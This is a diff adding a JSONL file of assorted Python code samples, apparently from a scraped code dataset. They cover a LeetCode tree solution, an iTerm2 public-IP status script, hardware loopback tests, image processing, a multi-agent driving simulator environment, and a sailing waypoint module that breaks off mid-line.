diff --git "a/4114.jsonl" "b/4114.jsonl" new file mode 100644--- /dev/null +++ "b/4114.jsonl" @@ -0,0 +1,635 @@ +{"seq_id":"631888591","text":"#Time Complexity : O(N)\n#Space Complexity: O(N)\n#Yes it ran on leetcode\n\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n global dic\n dic = {}\n global idx\n idx = 0\n if len(preorder) == 0 and len(inorder) == 0:\n return None\n for i in range(len(inorder)):\n dic[inorder[i]] = i\n return self.helper(preorder, inorder, 0, len(inorder) - 1)\n\n def helper(self, preorder, inorder, start, end):\n global dic\n global idx\n # base\n if idx == len(preorder) or start > end:\n return None\n\n # logic\n\n rootIdx = dic[preorder[idx]]\n root = TreeNode(preorder[idx])\n idx += 1\n root.left = self.helper(preorder, inorder, start, rootIdx - 1)\n root.right = self.helper(preorder, inorder, rootIdx + 1, end)\n\n return root","sub_path":"Construct_Binary_Tree.py","file_name":"Construct_Binary_Tree.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"225415147","text":"#!/usr/bin/env python3\n\nimport urllib.request\nimport iterm2\n\n\nasync def main(connection):\n component = iterm2.StatusBarComponent(\n short_description=\"Show PublicIP\",\n detailed_description=\"Show Public IP Address\",\n knobs=[],\n exemplar=\"[Public IP]\",\n update_cadence=30,\n identifier=\"koh-sh.iterm2-statusbar-scripts.publicip\"\n )\n\n @iterm2.StatusBarRPC\n async def showpublicip(knobs):\n url = 'http://checkip.amazonaws.com/'\n try:\n req = urllib.request.Request(url)\n with urllib.request.urlopen(req) as res:\n body = res.read()\n return \"PublicIP: \" + str(body.decode()).replace(\"\\n\", \"\")\n except Exception:\n return \"No Connection\"\n\n await component.async_register(connection, showpublicip)\n\niterm2.run_forever(main)\n","sub_path":"publicip.py","file_name":"publicip.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"380277425","text":"\"\"\"Test the yig driver by looping back:\n note-cannot use YIG_*atten because it goes below ground\n YIG_1_tune to Analog_In_1 5:1 voltage divider\n YIG_1_tune to Analog_In_2 5:1 voltage divider\n YIG_2_tune to Analog_In_5 5:1 voltage divider\n YIG_2_tune to Analog_In_6 5:1 voltage divider\n P0_0 to P1_0\n P0_1 to P1_1\n P0_2 to P1_2\n\"\"\"\n\nimport time\nimport curses\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom time import sleep\nexec(compile(open(\"./io_board_subs.py\", \"rb\").read(), \"./io_board_subs.py\", 'exec'))\nGPIO.setwarnings(False)\ndef main(win):\n global stdscr\n stdscr = win\n curses.initscr()\n curses.nl()\n curses.noecho()\n#Instantiate the devices and objects we need\n dio = Dio()\n adc0 = Adc(0)\n dac0 = Dac(0)\n adc1 = Adc(1)\n dac1 = Dac(1)\n adc0.setOneShotMode()\n adc1.setOneShotMode()\n stdscr.clear\n stdscr.move(1,20)\n stdscr.addstr(\"YIG DRIVER LOOPBACK\")\n stdscr.move(2,1)\n stdscr.addstr(\"count: \")\n stdscr.move(4,1)\n stdscr.addstr(\"ANALOG_IN_1: \")\n stdscr.move(5,1)\n stdscr.addstr(\"ANALOG_IN_2: \")\n stdscr.move(6,1)\n stdscr.addstr(\"ANALOG_IN_5: \")\n stdscr.move(7,1)\n stdscr.addstr(\"ANALOG_IN_6: \")\n stdscr.move(9,1)\n stdscr.addstr(\"DIO OUT\")\n stdscr.move(9,12)\n stdscr.addstr(\"DIO IN\")\n stdscr.move(10,1)\n stdscr.addstr(\"0: \")\n stdscr.move(11,1)\n stdscr.addstr(\"1: \")\n stdscr.move(12,1)\n stdscr.addstr(\"2: \")\n stdscr.move(13,1)\n stdscr.addstr(\"4: \")\n stdscr.refresh()\n def check_db():\n dac0.write(2,32767) # U3-7 V_OUTC Analog_Out_3\n dac1.write(2,32767) # U6-7 V_OUTC Analog_Out_7\n i = 0\n while True:\n i = i+1\n stdscr.move(2,15)\n stdscr.clrtoeol()\n stdscr.addstr(str(i))\n dac0.write(0,i) # U3-1 V_OUTA Analog_Out_1 YIG_1_tune\n# dac1.write(0,i) # U6-1 V_OUTA Analog_Out_5 YIG_2_tune\n# dac0.write(1,i) # U3-2 V_OUTB Analog_Out_2 YIG_1_atten\n# dac0.write(3,i) # U6-2 V_OUTB Analog_Out_6 YIG_2_atten\n# Analog_In_1 = adc0.read(0)\n stdscr.move(4,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_1))\n# Analog_In_2 = adc0.read(1)\n stdscr.move(5,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_2))\n# Analog_In_5 = adc1.read(0)\n stdscr.move(6,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_5))\n# Analog_In_6 = adc1.read(1)\n stdscr.move(7,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_6))\n# dio.write(0)\n# readback = dio.read()\n stdscr.move(10,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(1)\n# readback = dio.read()\n stdscr.move(11,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(2)\n# readback = dio.read()\n stdscr.move(12,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(4)\n# readback = dio.read()\n stdscr.move(13,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n stdscr.refresh()\n sleep(0.05)\n if i >= 65535: \n i = 0\n check_db()\n curses.nocbreak(); \n stdscr.keypad(0); \n curses.echo()\ncurses.wrapper(main)\n","sub_path":"look_at_i2c_buss.py","file_name":"look_at_i2c_buss.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"653502721","text":"import numpy as np\nimport matplotlib\n\n# sudo apt install python3-tk\n# sudo -H pip3 install PyQt5\n# print('matplotlib all backends are:')\n# backends = sorted(matplotlib.rcsetup.all_backends, key=str.lower)\n# for backend in backends:\n# \tprint(' ', backend)\n# print('matplotlib default backend is:', matplotlib.get_backend())\n# matplotlib.use('Qt5Agg')\n# print('matplotlib current backend is:', matplotlib.get_backend())\nimport matplotlib.pyplot as plt\n\ndef mandelbrot(h, w, maxit=20):\n\t\"\"\"Returns an image of the Mandelbrot fractal of size (h,w).\"\"\"\n\ty, x = np.ogrid[-1.4:1.4:h * 1j, -2:0.8:w * 1j]\n\tc = x + y * 1j\n\tz = c\n\tdivtime = maxit + np.zeros(z.shape, dtype=int)\n\n\tfor i in range(maxit):\n\t\tz = z ** 2 + c\n\t\tdiverge = z * np.conj(z) > 2 ** 2 # who is diverging\n\t\tdiv_now = diverge & (divtime == maxit) # who is diverging now\n\t\tdivtime[div_now] = i # note when\n\t\tz[diverge] = 2 # avoid diverging too much\n\n\treturn divtime\n\ndef plot_histogram1():\n\t# Build a vector of 10000 normal deviates with variance 0.5^2 and mean 2\n\tmu, sigma = 2, 0.5\n\tv = np.random.normal(mu, sigma, 10000)\n\t# Plot a normalized histogram with 50 bins\n\tplt.hist(v, bins=50, normed=1) # matplotlib version (plot)\n\tplt.show()\n\ndef plot_histogram2():\n\tmu, sigma = 2, 0.5\n\tv = np.random.normal(mu, sigma, 10000)\n\t# Compute the histogram with numpy and then plot it\n\t(n, bins) = np.histogram(v, bins=50, normed=True) # NumPy version (no plot)\n\tplt.plot(.5 * (bins[1:] + bins[:-1]), n)\n\tplt.show()\n\ndef main():\n\tplt.imshow(mandelbrot(400, 400))\n\tplt.show()\n\t# plt.savefig('foo.png')\n\n\tplot_histogram1()\n\n\tplot_histogram2()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"toys/numpy_mandelbrot.py","file_name":"numpy_mandelbrot.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"238680884","text":"import cv2\nimport numpy as np\n\n# https://www.youtube.com/watch?v=WQeoO7MI0Bs\n\nimg = cv2.imread(\"resources/Lena.png\")\nkernel = np.ones((5, 5), np.uint8)\n\n# making an image gray\nimgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# cv2.imshow(\"gray image\", imgGray)\n\n# making an image blur\nimgBlur = cv2.GaussianBlur(imgGray, (7, 7), 0) # kernel need to be odd numbers\n# cv2.imshow(\"blur image\", imgBlur)\n\n# edge detection\nimgCanny = cv2.Canny(img, 150, 200)\n# cv2.imshow(\"canny\", imgCanny)\n\n# dialation\nimgDialation = cv2.dilate(imgCanny, kernel, iterations=1)\n# cv2.imshow(\"dialation\", imgDialation)\n\n# thinner image\nimgEroded = cv2.erode(imgDialation, kernel, iterations=1)\n# cv2.imshow(\"eroded\", imgEroded)\n\ncv2.waitKey(0)\n","sub_path":"Chapter2.py","file_name":"Chapter2.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"187254924","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n############\n# Standard #\n############\nimport os\nimport logging\n\n###############\n# Third Party #\n###############\nimport cv2\nimport numpy as np\nimport simplejson as sjson\nfrom pyadplugin import ADPluginServer, ADPluginFunction\n\n##########\n# Module #\n##########\nfrom .statistics import contouring_pipeline\n\nlogger = logging.getLogger(__name__)\n\ndef contouring_plugin(ad_prefix, plugin_prefix=\"\", plugin_suffix=\"\", \n save_image=False, image_dir=None, save_json=False, \n json_path=None, min_cbtime=2, stream=\"IMAGE2\",\n enable_callbacks=True, resize=1.0, kernel=(11,11),\n description=\"\", threshold_factor=2):\n \"\"\"\n Runs a pyadplugin that uses the contouring pipeline.\n \"\"\"\n # Set the image saving path\n if save_image:\n save_frequency = 0.2\n if image_dir is None:\n image_dir = Path(os.path.dirname(os.path.abspath(__file__)) / \n \"{0}_images_{1}\".format(\n plugin_prefix, plugin_suffix))\n else:\n image_dir = Path(str(image_dir))\n # Check that the path exists, create it if not\n if not image_dir.exists():\n image_dir.mkdir(parents=True)\n\n # Set the json saving path\n if save_json:\n if json_path is None:\n json_path = Path(os.path.dirname(os.path.abspath(__file__)) / \n \"{0}_data{1}.json\".format(\n plugin_prefix, plugin_suffix))\n else:\n json_path = Path(str(json_path))\n # Check the file and its parents exist, making them if they don't\n if not json_path.exists():\n json_path.parent.mkdir(parents=True)\n json_path.touch()\n\n # Description to be passed on as a PV\n if not description:\n description = \"PyADPlugin '{0}{1}': Pipeline to output beam statitics.\"\n\n # Define the ADPluginFunction\n def pyad_contouring_plugin(array, height=None, width=None):\n return contouring_pipeline(\n array, height=height, width=width, resize=resize, kernel=kernel,\n prefix=plugin_prefix, suffix=plugin_suffix, save=save_frequency,\n description=description, json_path=json_path, save_image=save_image,\n image_dir=image_dir, thresh_factor=threshold_factor)\n\n # Define the default values for the pv dictionary\n output_dict = {\n \"{0}:DESC{1}\".format(plugin_prefix, plugin_suffix): description,\n \"{0}:BEAM{1}\".format(plugin_prefix, plugin_suffix) : False, \n \"{0}:CENT:X{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:CENT:Y{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:LENGTH{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:WIDTH{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:AREA{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:MATCH{1}\".format(plugin_prefix, plugin_suffix) : -1,\n \"{0}:M{1}\".format(plugin_prefix, plugin_suffix) : np.zeros((24))-1,\n }\n\n logger.info(\"Running '{0}{1}' server for '{2}'.\".format(\n plugin_prefix, plugin_suffix, ad_prefix))\n\n try:\n # Set up the server\n pyad_server = ADPluginServer(\n prefix = prefix,\n ad_prefix = ad_prefix,\n stream = stream,\n min_cbtime = min_cbtime,\n enable_callbacks = enable_callbacks,\n )\n\n # Define the function\n pyad_function = ADPluginFunction(\n \"{0}{1}\".format(plugin_prefix, plugin_suffix), \n output_dict,\n pyad_contouring_plugin,\n pyad_server,\n )\n \n # Log any exceptions we run into\n except Exception as e:\n logger.error(\"Exception raised by pyad server/function:\\n{0}\".format(e))\n raise\n\n \n \n\n \n \n \n \n \n","sub_path":"psbeam/pyadplugins/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"277501941","text":"# library imports\nimport cv2.cv2 as cv\nimport numpy as np\n\n# Chargement d'une image\nimg = cv.imread('../images/bgr.png')\ncv.imshow('Input', img)\n\n# Récupération de la longueur et la largueur\nwidth = img.shape[0]\nheight = img.shape[1]\n\n# Récupération des canaux de couleurs\nblues, greens, reds = cv.split(img)\n\n# display the image with OpenCV imshow()\n# cv.imshow('(B)lues', blues)\n# cv.imshow('(G)reens', greens)\n# cv.imshow('(R)eds ', reds)\n\n# Création d'une matrice vide avec convertion du depth\nzero = np.zeros((width, height))\nzero = np.uint8(zero)\n\nRG = cv.merge([zero, greens, reds])\nBR = cv.merge((blues, zero, reds))\nBG = cv.merge((blues, greens, zero))\nB = cv.merge((blues, zero, zero))\nG = cv.merge((zero, greens, zero))\nR = cv.merge((zero, zero, reds))\ncv.imshow('R+G', RG)\ncv.imshow('R+B', BR)\ncv.imshow('B+G', BG)\ncv.imshow('B', B)\ncv.imshow('G', G)\ncv.imshow('R', R)\n\n# OpenCV waitKey() is a required keyboard binding function after imwshow()\ncv.waitKey(0)\n# destroy all windows command\ncv.destroyAllWindows()","sub_path":"Exercices/exercice2.py","file_name":"exercice2.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"492740033","text":"import copy\nimport logging\n\nfrom pgdrive.constants import TerminationState\nfrom pgdrive.envs.pgdrive_env_v2 import PGDriveEnvV2\nfrom pgdrive.scene_creator.blocks.first_block import FirstBlock\nfrom pgdrive.scene_creator.road.road import Road\nfrom pgdrive.scene_manager.spawn_manager import SpawnManager\nfrom pgdrive.utils import setup_logger, get_np_random, PGConfig\nfrom pgdrive.utils.pg_config import merge_dicts\n\nMULTI_AGENT_PGDRIVE_DEFAULT_CONFIG = dict(\n # ===== Multi-agent =====\n is_multi_agent=True,\n num_agents=2, # If num_agents is set to None, then endless vehicles will be added only the empty spawn points exist\n\n # Whether to terminate a vehicle if it crash with others. Since in MA env the crash is extremely dense, so\n # frequently done might not be a good idea.\n crash_done=False,\n out_of_road_done=True,\n delay_done=25, # Wait for 5 seconds in real world.\n\n # Whether the vehicle can rejoin the episode\n allow_respawn=True,\n\n # The maximum length of the episode. If allow respawn, then this is the maximum step that respawn can happen. After\n # that, the episode won't terminate until all existing vehicles reach their horizon or done. The vehicle specified\n # horizon is also this value.\n horizon=1000,\n\n # ===== Vehicle Setting =====\n vehicle_config=dict(lidar=dict(num_lasers=72, distance=40, num_others=0)),\n target_vehicle_configs=dict(),\n\n # ===== New Reward Setting =====\n out_of_road_penalty=10,\n crash_vehicle_penalty=10,\n crash_object_penalty=10,\n crash_vehicle_cost=1,\n crash_object_cost=1,\n out_of_road_cost=0, # Do not count out of road into cost!\n\n # ===== Environmental Setting =====\n top_down_camera_initial_x=0,\n top_down_camera_initial_y=0,\n top_down_camera_initial_z=120, # height\n traffic_density=0.,\n auto_termination=False,\n camera_height=4,\n)\n\n\nclass MultiAgentPGDrive(PGDriveEnvV2):\n \"\"\"\n This serve as the base class for Multi-agent PGDrive!\n \"\"\"\n\n # A list of road instances denoting which roads afford spawn points. If not set, then search for all\n # possible roads and spawn new agents in them if possible.\n spawn_roads = [\n # Road(FirstBlock.NODE_1, FirstBlock.NODE_2),\n Road(FirstBlock.NODE_2, FirstBlock.NODE_3)\n ]\n\n @staticmethod\n def default_config() -> PGConfig:\n config = PGDriveEnvV2.default_config()\n config.update(MULTI_AGENT_PGDRIVE_DEFAULT_CONFIG)\n return config\n\n def __init__(self, config=None):\n self._raw_input_config = copy.deepcopy(config)\n super(MultiAgentPGDrive, self).__init__(config)\n self._top_down_renderer = None\n\n def _process_extra_config(self, config) -> \"PGConfig\":\n ret_config = self.default_config().update(\n config, allow_overwrite=False, stop_recursive_update=[\"target_vehicle_configs\"]\n )\n if not ret_config[\"crash_done\"] and ret_config[\"crash_vehicle_penalty\"] > 2:\n logging.warning(\n \"Are you sure you wish to set crash_vehicle_penalty={} when crash_done=False?\".format(\n ret_config[\"crash_vehicle_penalty\"]\n )\n )\n if ret_config[\"use_render\"] and ret_config[\"fast\"]:\n logging.warning(\"Turn fast=False can accelerate Multi-agent rendering performance!\")\n\n # Workaround\n if ret_config[\"target_vehicle_configs\"]:\n for k, v in ret_config[\"target_vehicle_configs\"].items():\n old = ret_config[\"vehicle_config\"].copy()\n new = old.update(v)\n ret_config[\"target_vehicle_configs\"][k] = new\n\n self._spawn_manager = SpawnManager(\n exit_length=ret_config[\"map_config\"][\"exit_length\"],\n lane_num=ret_config[\"map_config\"][\"lane_num\"],\n num_agents=ret_config[\"num_agents\"],\n vehicle_config=ret_config[\"vehicle_config\"],\n target_vehicle_configs=ret_config[\"target_vehicle_configs\"],\n seed=self._DEBUG_RANDOM_SEED\n )\n\n self._spawn_manager.set_spawn_roads(self.spawn_roads)\n\n ret_config = self._update_agent_pos_configs(ret_config)\n return ret_config\n\n def _update_agent_pos_configs(self, config):\n config[\"target_vehicle_configs\"] = self._spawn_manager.get_target_vehicle_configs(seed=self._DEBUG_RANDOM_SEED)\n return config\n\n def done_function(self, vehicle_id):\n done, done_info = super(MultiAgentPGDrive, self).done_function(vehicle_id)\n if done_info[TerminationState.CRASH] and (not self.config[\"crash_done\"]):\n assert done_info[TerminationState.CRASH_VEHICLE] or \\\n done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]\n if not (done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]):\n # Does not revert done if high-priority termination happens!\n done = False\n\n if done_info[TerminationState.OUT_OF_ROAD] and (not self.config[\"out_of_road_done\"]):\n assert done_info[TerminationState.CRASH_VEHICLE] or \\\n done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]\n if not done_info[TerminationState.SUCCESS]:\n done = False\n\n return done, done_info\n\n def step(self, actions):\n o, r, d, i = super(MultiAgentPGDrive, self).step(actions)\n o, r, d, i = self._after_vehicle_done(o, r, d, i)\n\n # Update respawn manager\n if self.episode_steps >= self.config[\"horizon\"] or self.scene_manager.replay_system is not None:\n self.agent_manager.set_allow_respawn(False)\n self._spawn_manager.step()\n new_obs_dict = self._respawn_vehicles(randomize_position=self.config[\"random_traffic\"])\n if new_obs_dict:\n for new_id, new_obs in new_obs_dict.items():\n o[new_id] = new_obs\n r[new_id] = 0.0\n i[new_id] = {}\n d[new_id] = False\n\n # Update __all__\n d[\"__all__\"] = (\n ((self.episode_steps >= self.config[\"horizon\"]) and (all(d.values()))) or (len(self.vehicles) == 0)\n or (self.episode_steps >= 5 * self.config[\"horizon\"])\n )\n if d[\"__all__\"]:\n for k in d.keys():\n d[k] = True\n\n return o, r, d, i\n\n def reset(self, *args, **kwargs):\n self.config = self._update_agent_pos_configs(self.config)\n ret = super(MultiAgentPGDrive, self).reset(*args, **kwargs)\n assert (len(self.vehicles) == self.num_agents) or (self.num_agents == -1)\n return ret\n\n def _reset_agents(self):\n # update config (for new possible spawn places)\n for v_id, v in self.vehicles.items():\n if v_id in self.config[\"target_vehicle_configs\"]:\n v.vehicle_config = self._get_single_vehicle_config(self.config[\"target_vehicle_configs\"][v_id])\n super(MultiAgentPGDrive, self)._reset_agents() # Update config before actually resetting!\n for v_id, _ in self.vehicles.items():\n self._update_destination_for(v_id)\n\n def _after_vehicle_done(self, obs=None, reward=None, dones: dict = None, info=None):\n if self.scene_manager.replay_system is not None:\n return obs, reward, dones, info\n for v_id, v_info in info.items():\n if v_info.get(\"episode_length\", 0) >= self.config[\"horizon\"]:\n if dones[v_id] is not None:\n info[v_id][TerminationState.MAX_STEP] = True\n dones[v_id] = True\n self.dones[v_id] = True\n for dead_vehicle_id, done in dones.items():\n if done:\n self.agent_manager.finish(\n dead_vehicle_id, ignore_delay_done=info[dead_vehicle_id].get(TerminationState.SUCCESS, False)\n )\n self._update_camera_after_finish(dead_vehicle_id)\n return obs, reward, dones, info\n\n def _update_camera_after_finish(self, dead_vehicle_id):\n if self.main_camera is not None and dead_vehicle_id == self.agent_manager.object_to_agent(\n self.current_track_vehicle.name) \\\n and self.pg_world.taskMgr.hasTaskNamed(self.main_camera.CHASE_TASK_NAME):\n self.chase_another_v()\n\n def _get_target_vehicle_config(self):\n return {\n name: self._get_single_vehicle_config(new_config)\n for name, new_config in self.config[\"target_vehicle_configs\"].items()\n }\n\n def _get_observations(self):\n return {\n name: self.get_single_observation(self._get_single_vehicle_config(new_config))\n for name, new_config in self.config[\"target_vehicle_configs\"].items()\n }\n\n def _get_single_vehicle_config(self, extra_config: dict):\n \"\"\"\n Newly introduce method\n \"\"\"\n vehicle_config = merge_dicts(self.config[\"vehicle_config\"], extra_config, allow_new_keys=False)\n return PGConfig(vehicle_config)\n\n def _after_lazy_init(self):\n super(MultiAgentPGDrive, self)._after_lazy_init()\n\n # Use top-down view by default\n if hasattr(self, \"main_camera\") and self.main_camera is not None:\n top_down_camera_height = self.config[\"top_down_camera_initial_z\"]\n self.main_camera.camera.setPos(0, 0, top_down_camera_height)\n self.main_camera.top_down_camera_height = top_down_camera_height\n self.main_camera.stop_track(self.pg_world, self.current_track_vehicle)\n self.main_camera.camera_x += self.config[\"top_down_camera_initial_x\"]\n self.main_camera.camera_y += self.config[\"top_down_camera_initial_y\"]\n\n def _respawn_vehicles(self, randomize_position=False):\n new_obs_dict = {}\n if not self.agent_manager.has_pending_objects():\n return new_obs_dict\n while True:\n new_id, new_obs = self._respawn_single_vehicle(randomize_position=randomize_position)\n if new_obs is not None:\n new_obs_dict[new_id] = new_obs\n else:\n break\n return new_obs_dict\n\n def _force_respawn(self, agent_name, randomize_position=False):\n \"\"\"\n This function can force a given vehicle to respawn!\n \"\"\"\n self.agent_manager.finish(agent_name, ignore_delay_done=True)\n self._update_camera_after_finish(agent_name)\n new_id, new_obs = self._respawn_single_vehicle(randomize_position=randomize_position)\n return new_id, new_obs\n\n def _respawn_single_vehicle(self, randomize_position=False):\n \"\"\"\n Arbitrary insert a new vehicle to a new spawn place if possible.\n \"\"\"\n safe_places_dict = self._spawn_manager.get_available_respawn_places(\n self.pg_world, self.current_map, randomize=randomize_position\n )\n if len(safe_places_dict) == 0 or not self.agent_manager.allow_respawn:\n # No more run, just wait!\n return None, None\n assert len(safe_places_dict) > 0\n bp_index = get_np_random(self._DEBUG_RANDOM_SEED).choice(list(safe_places_dict.keys()), 1)[0]\n new_spawn_place = safe_places_dict[bp_index]\n\n if new_spawn_place[self._spawn_manager.FORCE_AGENT_NAME] is not None:\n if new_spawn_place[self._spawn_manager.FORCE_AGENT_NAME] != self.agent_manager.next_agent_id():\n return None, None\n\n new_agent_id, vehicle = self.agent_manager.propose_new_vehicle()\n new_spawn_place_config = new_spawn_place[\"config\"]\n vehicle.vehicle_config.update(new_spawn_place_config)\n vehicle.reset(self.current_map)\n self._update_destination_for(new_agent_id)\n vehicle.update_state(detector_mask=None)\n self.dones[new_agent_id] = False # Put it in the internal dead-tracking dict.\n\n new_obs = self.observations[new_agent_id].observe(vehicle)\n return new_agent_id, new_obs\n\n def _update_destination_for(self, vehicle_id):\n pass\n\n # when agent re-joined to the game, call this to set the new route to destination\n # end_road = -get_np_random(self._DEBUG_RANDOM_SEED).choice(self.spawn_roads) # Use negative road!\n # vehicle.routing_localization.set_route(vehicle.lane_index[0], end_road.end_node)\n\n def render(self, mode='human', text=None, *args, **kwargs):\n if mode == \"top_down\":\n ret = self._render_topdown(*args, **kwargs)\n else:\n ret = super(MultiAgentPGDrive, self).render(mode=mode, text=text)\n return ret\n\n def _render_topdown(self, *args, **kwargs):\n if self._top_down_renderer is None:\n from pgdrive.obs.top_down_renderer import TopDownRenderer\n self._top_down_renderer = TopDownRenderer(self.current_map, *args, **kwargs)\n self._top_down_renderer.render(list(self.vehicles.values()))\n\n def close_and_reset_num_agents(self, num_agents):\n config = copy.deepcopy(self._raw_input_config)\n self.close()\n config[\"num_agents\"] = num_agents\n super(MultiAgentPGDrive, self).__init__(config)\n\n\ndef _test():\n setup_logger(True)\n env = MultiAgentPGDrive(\n {\n \"num_agents\": 12,\n \"allow_respawn\": False,\n \"use_render\": True,\n \"debug\": False,\n \"fast\": True,\n \"manual_control\": True,\n \"pg_world_config\": {\n \"pstats\": False\n },\n }\n )\n o = env.reset()\n total_r = 0\n for i in range(1, 100000):\n # o, r, d, info = env.step(env.action_space.sample())\n o, r, d, info = env.step({v_id: [0, 1] for v_id in env.vehicles.keys()})\n for r_ in r.values():\n total_r += r_\n # o, r, d, info = env.step([0,1])\n d.update({\"total_r\": total_r})\n # env.render(text=d)\n if len(env.vehicles) == 0:\n total_r = 0\n print(\"Reset\")\n env.reset()\n env.close()\n\n\ndef _vis():\n setup_logger(True)\n env = MultiAgentPGDrive(\n {\n # \"use_render\": True,\n # \"fast\": True,\n \"num_agents\": 12,\n \"allow_respawn\": False,\n \"manual_control\": True,\n \"pg_world_config\": {\n \"pstats\": False\n },\n }\n )\n o = env.reset()\n total_r = 0\n for i in range(1, 100000):\n # o, r, d, info = env.step(env.action_space.sample())\n o, r, d, info = env.step({v_id: [0.0, 0.0] for v_id in env.vehicles.keys()})\n for r_ in r.values():\n total_r += r_\n # o, r, d, info = env.step([0,1])\n # d.update({\"total_r\": total_r})\n env.render(mode=\"top_down\")\n if len(env.vehicles) == 0:\n total_r = 0\n print(\"Reset\")\n env.reset()\n env.close()\n\n\ndef pygame_replay(name, env_class, save=True, other_ckpt=None):\n import copy\n import json\n import pygame\n env = env_class({\"use_topdown\": True})\n ckpt = \"metasvodist_{}_best.json\".format(name) if other_ckpt is None else other_ckpt\n with open(ckpt, \"r\") as f:\n traj = json.load(f)\n o = env.reset(copy.deepcopy(traj))\n frame_count = 0\n while True:\n o, r, d, i = env.step(env.action_space.sample())\n env.pg_world.force_fps.toggle()\n env.render(mode=\"top_down\", num_stack=50, film_size=(4000, 4000), history_smooth=0)\n if save:\n pygame.image.save(env._top_down_renderer._runtime, \"{}_{}.png\".format(name, frame_count))\n frame_count += 1\n if len(env.scene_manager.replay_system.restore_episode_info) == 0:\n env.close()\n\n\nif __name__ == '__main__':\n _vis()\n","sub_path":"pgdrive/envs/multi_agent_pgdrive.py","file_name":"multi_agent_pgdrive.py","file_ext":"py","file_size_in_byte":15730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"43254788","text":"'''\nCreated on Jan 19, 2013\n\n@author: joshandrews\n'''\nimport math\nimport sys\nsys.path.append(\"..\")\nfrom datetime import datetime\nimport control.logic.standardcalc as standardcalc\nimport control.GlobalVars as gVars\nimport control.StaticVars as sVars\nimport thread\nimport control.sailbotlogger as SBLogger\nfrom control.logic import coresailinglogic\n\ndef setWayPtCoords(boxCoords): #sets the waypoints of the challenge\n wayPtCoords = [] #order = top face, right face, bottom face, left face\n if (boxCoords[0].lat == boxCoords[1].lat): #square\n wayPtCoords[0] = standardcalc.GPSDistAway(boxCoords[0], 20.0, 100.0)\n wayPtCoords[1] = standardcalc.GPSDistAway(boxCoords[1], 100.0, -20.0)\n wayPtCoords[2] = standardcalc.GPSDistAway(boxCoords[2], -20.0, -100.0)\n wayPtCoords[3] = standardcalc.GPSDistAway(boxCoords[3], -100.0, 20.0)\n elif (boxCoords[0].lat < boxCoords[1].lat): #diamond or tilted left square\n cAngle = standardcalc.angleBetweenTwoCoords(boxCoords[0],boxCoords[1])\n wayPntDist1 = 100.0*math.cos(cAngle)\n wayPntDist2 = 100.0*math.sin(cAngle)\n midDist1 = 20.0*math.cos(90 - cAngle)\n midDist2 = 20.0*math.sin(90 - cAngle)\n \n topMidpnt = standardcalc.GPSDistAway(boxCoords[0], midDist1, midDist2)\n rightMidpnt = standardcalc.GPSDistAway(boxCoords[1], midDist2, -midDist1)\n botMidpnt = standardcalc.GPSDistAway(boxCoords[2], -midDist1, -midDist2)\n leftMidpnt = standardcalc.GPSDistAway(boxCoords[3], -midDist2, midDist1)\n wayPtCoords[0] = standardcalc.GPSDistAway(topMidpnt, -wayPntDist1, wayPntDist2)\n wayPtCoords[1] = standardcalc.GPSDistAway(rightMidpnt, wayPntDist2, wayPntDist1)\n wayPtCoords[2] = standardcalc.GPSDistAway(botMidpnt, wayPntDist1, -wayPntDist2)\n wayPtCoords[3] = standardcalc.GPSDistAway(leftMidpnt, -wayPntDist2, -wayPntDist1)\n else: #right tilted square\n cAngle = 180 - standardcalc.angleBetweenTwoCoords(boxCoords[0],boxCoords[1])\n wayPntDist1 = 100.0*math.cos(cAngle)\n wayPntDist2 = 100.0*math.sin(cAngle)\n midDist1 = 20.0*math.cos(90 - cAngle)\n midDist2 = 20.0*math.sin(90 - cAngle)\n \n topMidpnt = standardcalc.GPSDistAway(boxCoords[0], midDist1, -midDist2)\n rightMidpnt = standardcalc.GPSDistAway(boxCoords[1], -midDist2, -midDist1)\n botMidpnt = standardcalc.GPSDistAway(boxCoords[2], -midDist1, midDist2)\n leftMidpnt = standardcalc.GPSDistAway(boxCoords[3], midDist2, midDist1)\n wayPtCoords[0] = standardcalc.GPSDistAway(topMidpnt, wayPntDist1, wayPntDist2)\n wayPtCoords[1] 